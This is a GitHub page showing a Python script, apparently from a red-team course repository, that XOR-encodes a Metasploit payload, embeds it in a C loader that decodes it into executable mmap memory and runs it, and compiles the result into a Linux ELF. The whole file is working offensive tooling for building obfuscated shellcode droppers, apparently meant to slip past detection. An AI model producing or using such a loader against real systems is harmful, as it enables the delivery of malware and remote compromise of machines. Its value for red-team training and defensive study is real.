forked from klezVirus/msf-revhttp-gen
-
Notifications
You must be signed in to change notification settings - Fork 0
/
elf-compiler.py
126 lines (97 loc) · 3.19 KB
/
elf-compiler.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
# Red Team Operator course code template
# payload encryption with XOR
#
# author: reenz0h (twitter: @sektor7net)
import os
import sys
import struct
import argparse
import subprocess
from binascii import hexlify, unhexlify
KEY = "Microsoft"
TEMP="/tmp/inject.c"
PLACEHOLDER = "####SHELLCODE####"
TEMPLATE = r"""
//gcc -m32 file.c (32-bit)
//gcc file.c (64-bit)
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
char key [] = "Microsoft";
unsigned char bytes[] = ####SHELLCODE####;
void XOR(char * books, size_t data_len, char * pey, size_t book_len) {
int k;
k = 0;
for (int i = 0; i < data_len; i++) {
if (k == book_len - 1) k = 0;
books[i] = books[i] ^ pey[k];
k++;
}
}
int main() {
XOR((char *) bytes, sizeof(bytes), key, sizeof(key));
void* region = mmap(NULL,
sizeof(bytes),
PROT_WRITE | PROT_EXEC,
MAP_ANONYMOUS | MAP_PRIVATE,
-1,
0);
if(region == MAP_FAILED) {
perror("mmap");
return 1;
}
memcpy(region, bytes, sizeof(bytes));
printf("executing %ld bytes shellcode using mmap system call\n", sizeof(bytes));
((int(*)())region)();
//unreachable code
munmap(region, sizeof(bytes));
return 0;
}
"""
def xor(data, key):
encoded = b""
key = bytes(key, 'utf-8')
if isinstance(data, str):
data = bytes(data, 'utf-8')
for i in range(len(data)):
encoded += struct.pack("B", (data[i] ^ (key[i % len(key)])))
return encoded
def generate(shellcode):
content = TEMPLATE
with open(TEMP, "w") as sourcefile:
content = content.replace(PLACEHOLDER, shellcode)
sourcefile.write(content)
def compile(out=None, arch="x64"):
cmd = "gcc "
if arch == "x86":
cmd += "-m32 "
if out:
cmd += f"-o {out} "
cmd += TEMP
try:
output = subprocess.check_output(cmd, shell=True)
except Exception as e:
print("[-] Error during compilation")
print(e)
def formatted_ciphertext(ciphertext):
ciphertext = hexlify(ciphertext).decode()
return '{ 0x' + ', 0x'.join(ciphertext[i:i+2] for i in range(0, len(ciphertext), 2)) + ' }'
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Linux Shellcode Execution Payload Generator")
parser.add_argument("-p", "--payload", type=str, required=True, help="Metasploit payload")
parser.add_argument("-a", "--arch", choices=["x64", "x86"], default="x64", help="Metasploit payload architecture")
parser.add_argument("-o", "--outfile", type=str, default="inject.elf", required=False, help="Output file name")
args = parser.parse_args()
if not os.path.isfile(args.payload):
print("[-] Error, Metasploit payload not found")
sys.exit(1)
print("[+] Encoding payload")
plaintext = open(args.payload, "rb").read()
ciphertext = xor(plaintext, KEY)
print("[+] Generating injector stub")
shellcode = formatted_ciphertext(ciphertext)
generate(shellcode)
print(f"[+] Compiling to {args.outfile}")
compile(out=args.outfile, arch=args.arch)
print("[+] Done")
#print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')